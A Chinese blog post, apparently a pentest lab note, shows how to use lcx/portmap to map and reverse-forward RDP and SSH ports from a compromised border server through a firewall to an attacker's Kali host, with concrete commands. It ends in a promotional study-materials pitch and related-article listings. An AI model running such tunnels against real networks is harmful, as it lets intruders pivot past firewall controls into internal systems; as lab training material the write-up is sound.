【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用(1)

最新推荐文章于 2024-08-23 17:37:15 发布
最新推荐文章于 2024-08-23 17:37:15 发布
阅读量331 收藏 5
点赞数 5
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969722/article/details/138793283
版权

实验环境

kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)
Windows2012(DC,内网地址:10.1.1.2)
在这里插入图片描述

1 下载与部署

下载地址:https://github.com/AA8j/SecTools/tree/main/lcx
注意:Linux下为portmap。

2 使用方法

2.1 本地端口映射

假如此时已经拿到了边界服务器的权限,但是由于防火墙策略限制导致3389端口无法出网,此时可以将此端口映射到可以出网的端口。

2.1.1 边界服务器为Windows的情况

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx -tran 53 192.168.8.56 3389

在这里插入图片描述
效果演示
此时远程桌面连接192.168.8.56的53端口即可:
在这里插入图片描述
在这里插入图片描述
此时会有数据日志:
在这里插入图片描述

2.1.2 边界服务器为Linux的情况

使用ssh端口转发更方便。在应用层隧道会讲到。

2.2 本地端口转发

假如此时已经拿到了边界服务器Windows2012的权限,但是由于防火墙限制,进网端口被限制,但可以出网,此时就可以将边界服务器的端口转发到kali上,然后访问kali的端口。

2.2.1 边界服务器为Windows的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 3389


./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 3389(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的3389端口。


m的参数说明:
1.监听port1 (p1)端口并且连接主机2(h2)的port2(p2) 端口
2.监听port1(p1)和port2(p2) 端口
3.连接主机1(h1)对应的端口和主机2(h2)对应的端口

在这里插入图片描述

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx.exe -slave 192.168.8.48 4444 127.0.0.1 3389


lcx.exe -slave 192.168.8.48(转发到目的IP) 4444(转发到目的端口) 127.0.0.1 3389(转发的本地端口)
# 表示将本地的3389端口转发到192.168.8.48的4444端口

在这里插入图片描述

效果演示
此时通道就已经打通了,远程桌面连接kali(192.168.8.48)即会连接到内网的Windows2012。
在这里插入图片描述
在这里插入图片描述
此时两端都会有数据日志显示:
在这里插入图片描述
在这里插入图片描述

2.2.2 边界服务器为Linux的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 222


./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 222(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的222端口。

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/40865938e04afa8253337b599f3badd8.png)

![img](https://img-blog.csdnimg.cn/img_convert/f41bfa00e816b2954c2b3356991153ea.png)

![img](https://img-blog.csdnimg.cn/img_convert/6e11cf36991d3f28cc41eabe830638f8.png)

![img](https://img-blog.csdnimg.cn/img_convert/c783b58f76383bfd60e8dea434e9298c.png)

![img](https://img-blog.csdnimg.cn/img_convert/18288f91415b2910a78bdaace903b3af.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84969722
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux如何启动portmap服务,linux使用nfs、portmap服务共享远程磁盘的方法
weixin_42503076的博客
05-03 1209
NFS的安装配置:centos 5 :yum install nfs-utils portmapcentos 6 :yum install nfs-utils rpcbind本节是使用centos 6的配置过程:设备:两台 centos6 OS 安装的时候选择的是"Basic Server"软件配置包。首先,让两台机器都安装NFS的 软件包,如下显示的是服务器端:[root@roothomes /...
LCX端⼝转发
国内一线红队,擅长攻防渗透,APT
01-31 1187
LCX是一款十分经典的内网端口转发工具,基于Socket套接字,具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库,在实际利用的时候需要自行做免杀处理。lcx有三个功能:第一个功能将本地端口转发到本地另一个端口上第二个功能将本地端口准发到其他主机某个端口上(端口映射)第三个功能是进行监听并进行转发使用, 提取码:fn9o。
渗透测试笔记】之【内网渗透——传输层隧道lcxportmap)的使用:边界服务器分别为Windows和Linux下本地端口映射、转发)】
AA8j的博客
10-16 1981
文章目录1. lcx1.1 下载与部署1.2 使用方法1.2.1 内网端口转发2. netcat2.1 下载与部署kali2.2 使用方法kali2.3 效果演示3. PowerCat3.1 下载与部署kali3.2 使用方法kali3.3 效果演示 1. lcx 实验环境: kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:
端口转发工具lcx使用总结(lcx下载)
老野的成长之路
11-05 6946
原文地址:端口转发工具lcx使用总结(lcx下载)作者:醉清风xf 端口转发工具lcx使用总结 以远程桌面使用为例 一、跳板机方式      即:内网主机A只能通过具备外网访问权限的主机B进行访问,要使得外网主机C能够远程桌面到内网主机A     1、在跳板主机B上执行如下指令         lcx -listen 51 3389     //该句话的作用意味着在主机B
lcx.exe内网转发命令教程 + LCX免杀下载
冰河的专栏
11-29 4499
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84625404 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 192.168.109.137 2222 127.0.0.1 3389 192.168.109.137 为本机IP,2222...
内网渗透测试技术
09-13
内网渗透测试是一种模拟攻击者攻击网络内部系统的安全评估方法,目的是发现和修复网络内部的安全隐患。本知识点将详细介绍内网渗透测试中的关键技术点和实践步骤,包括内网转发、信息收集、横向移动和收尾工程。 ...
内网渗透讲解与实验手册
05-16
内网渗透测试是一种模拟黑客行为的安全评估活动,旨在发现并利用组织内部网络中的安全漏洞。它可以帮助企业了解其网络安全防御体系的强度,并识别潜在的安全威胁。内网渗透通常包括对网络设备、服务器、应用程序以及...
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
域渗透完全技巧.pdf
10-03
【网络安全】是保护网络系统免受恶意攻击的关键领域,而【内网渗透】则是网络安全中的一个环节,旨在发现并修复内部网络的安全漏洞。【域渗透】是针对Windows域环境进行的一种高级攻击技术,目的是控制域控制器,...
lcx端口内网转发工具
07-14
lcx端口转发
lcx工具,包括arm9和win版本
11-17
包含网上找到的lcx源码,该源码arm-linux(v5TE)和cygwin编译版本,还有lcx.exe在windows下的原版,使用方法参考命令帮助;可远程使用telnet、ssh等。
关于域渗透学习1
08-24
Windows平台下常用的工具是lcx,而Linux下常用的工具是portmap和iptables。这些工具可以将本地端口的数据转发到远程端口,也可以实现端口映射功能。netsh和ssh通道等工具的使用也对端口转发和内网穿透有着重要作用。...
lcx 工具学习
rnn0921的博客
08-17 438
意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。Lcx -slave <你的 ip> <监听端口(对应 listen 的第一个参数)> <目标 ip> <目标端口>Lcx -Listen <监听 slave 请求的端口(对应 slave 的第二个参数)> <等待连接的端口>Lcx -tran <等待连接的端口> <目标 ip> <目标端口>(1)端口转发(listen 和 slave 成对使用)5、lcx 内网端口转发,内网穿透。将安装目录加入环境变量。
lcx端口转发
Longwaer
12-30 3452
lcx端口转发: 本文主要通过讲解lcx的本地端口及远程端口转发,让能熟练使用lcx端口转发工具,对端口转发知识有更加深入了解,本次实验靶场来源于暗月(moonsec)师傅,本文内容全由本人通过学习理解编制,文中若有错处,大佬勿喷,个人学艺不精;所以想学习更多的渗透知识请找暗月师傅。 描述: lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx
内网隧道代理技术(二)之LCX端口转发
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-12 1556
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMapLCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。
端口转发之lcxportmap结合利用
Zlirving_的博客
02-12 993
目录端口转发端口转发与端口映射的区别工具介绍lcxportmap实验利用总结 端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。 比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑
MySQL 相关知识笔记
最新发布
weixin_68929783的博客
08-23 1037
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
内网渗透技术:LCX、Htran、ReDuh端口转发实验详解
"该文档是关于内网渗透的实验手册,涵盖了LCX、Htran.exe和ReDuh等工具的端口转发实验,目的是教授如何进行内网渗透测试和搭建练习环境。" 在网络安全领域,内网渗透是评估组织安全防御能力的重要环节,通常涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值